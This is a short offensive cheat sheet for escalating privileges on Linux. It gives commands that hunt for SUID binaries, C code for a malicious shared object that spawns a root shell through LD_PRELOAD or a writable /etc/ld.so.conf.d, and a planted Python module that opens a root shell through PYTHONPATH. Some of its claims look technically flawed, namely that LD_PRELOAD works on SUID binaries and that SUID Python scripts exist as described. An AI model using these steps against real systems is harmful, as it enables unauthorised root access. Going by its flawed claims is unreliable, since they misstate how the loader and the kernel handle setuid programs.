Shared Libraries & Interpreter Hijacking

LD_PRELOAD & Shared Library Hijacking

1. Find Binaries That Honor LD_PRELOAD (Including SUID)

   find / -perm -4000 -type f 2>/dev/null | while read -r bin; do
     echo "[*] Checking $bin"
     ldd "$bin" 2>/dev/null | grep "=>" && echo "[+] $bin loads shared libs"
   done
   

2. Create a Malicious Shared Object

   // exploit.c
   #include <unistd.h>
   void __attribute__((constructor)) init() {
       setuid(0);
       setgid(0);
       system("/bin/sh");
   }
   

   gcc -shared -fPIC -o /tmp/exploit.so exploit.c
   

3. Preload & Execute the SUID Binary

   export LD_PRELOAD=/tmp/exploit.so
   /path/to/suid_binary
   

4. If the binary loads libc or another library, your exploit.so runs as root.
5. Modify /etc/ld.so.conf.d if Writable

   echo "/home/user/mylibs" > /etc/ld.so.conf.d/malicious.conf
   ldconfig
   

6. Place your .so in /home/user/mylibs and run the vulnerable binary.

Python Module Hijacking

1. Locate SUID Python Scripts

   find / -perm -4000 -type f | grep "\.py$" 2>/dev/null
   

2. Create malicious python module

   mkdir -p /tmp/malicious
   cat << 'EOF' > /tmp/malicious/pickle.py
   import os
   os.setuid(0)
   os.system("/bin/sh")
   EOF
   

3. Set PYTHONPATH and Run the Script

   export PYTHONPATH=/tmp/malicious:$PYTHONPATH
   /usr/bin/vulnerable_suid_script.py
   

4. If vulnerable_suid_script.py does import pickle (or another module you control), it spawns a root shell.